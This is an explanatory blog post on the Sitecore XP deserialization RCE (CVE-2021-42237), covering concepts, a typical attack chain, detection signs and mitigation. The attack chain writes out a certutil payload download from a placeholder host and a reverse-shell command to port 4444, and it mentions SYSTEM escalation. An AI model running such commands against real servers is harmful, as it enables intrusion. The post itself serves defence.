An Intro to Sitecore XP Deserialization RCE (CVE-2021–42237) in 2022

Sitecore’s Experience Platform (XP) is a .NET enterprise content management system (CMS). Sitecore XP provides you with tools for content management, digital marketing, and analyzing and reporting.

CVE-2021–42237

Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability.

Key Concepts before getting started

Insecure Deserialization

Serialization is the conversion of an object into a static stream of bytes, which can be saved to a database or transfer over a network. Deserialization is the reverse of that process, reconstructing a data structure or object from a series of bytes.

The vulnerability occurs when untrusted data is used to abuse the logic of an application, inflict a denial of service (DoS) attack, or even execute arbitrary code upon it being deserialized.
When user-controllable data is deserialized by a website, this potentially enables an attacker to manipulate serialized objects to pass harmful data into the application code.

Web Shell

A web shell is typically a small piece of malicious code written in typical web development programming languages (e.g., ASP, PHP, JSP) that attackers implant on web servers to provide remote access and code execution to server functions.

IIS instance (w3wp.exe) running suspicious processes such as ‘cmd.exe /c echo’, ‘certutil.exe’, or ‘powershell.exe’ that result in the creation of script files in web-accessible folders is a rare event and is typically a strong sign of web shell activity.

Burp Collaborator

A network service that Burp Suite uses to help discover many kinds of vulnerabilities.

The Collaborator client can be used to generate payloads for use in manual testing, and poll the Collaborator server for any network interactions that result from using those payloads.

CertUtil

A Windows binary used for handling certificates.

The intended usage of certutil is to Dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components and verify certificates, key pairs, or certificate chains. But, it is possible to use the tool by attackers to fetch data from the Internet using a URL schema (ftp://, http://, etc).

How a typical attack would look like?

1. Scanning attempts on the vulnerable server
   

   URI: “/sitecore/shell/ClientBin/Reporting/Report.ashx”

   
   
2. nslookup from the endpoint towards burpcollaborator domain
   

   nslookup 5ouceXYZQtem.burpcollaborator.net

   
   
3. Payload download
   

   “C:\Windows\System32\cmd.exe” /c certutil -urlcache -f https://5ouceXYZQtem.burpcollaborator.netcertutil -f -urlcache

   
   

   http://A.B.C.D:8000/file.exe C:\Windows\Temp\file.exe

   
   
4. Reverse shell
   

   C:\Windows\Temp\file.exe A.B.C.D 4444 -e cmd

By successfully exploiting this vulnerability, an attacker can gain arbitrary code execution as the user who is running the IIS instance. The attacker can then use "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution.

Ideas for Detection

Mitigation

The recommended solution is to upgrade to a secure version ideally Sitecore XP 9.0 or higher.. Alternatively the flaw can be mitigated by deleting the Report.ashx file from
"/sitecore/shell/ClientBin/Reporting/Report.ashx" on all server instances.

Reference

• https://blog.assetnote.io/2021/11/02/sitecore-rce/
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42237
• https://lolbas-project.github.io/lolbas/Binaries/Certutil/
• https://docs.microsoft.com/en-us/dotnet/csharp/programming-guide/concepts/serialization/

Also published here.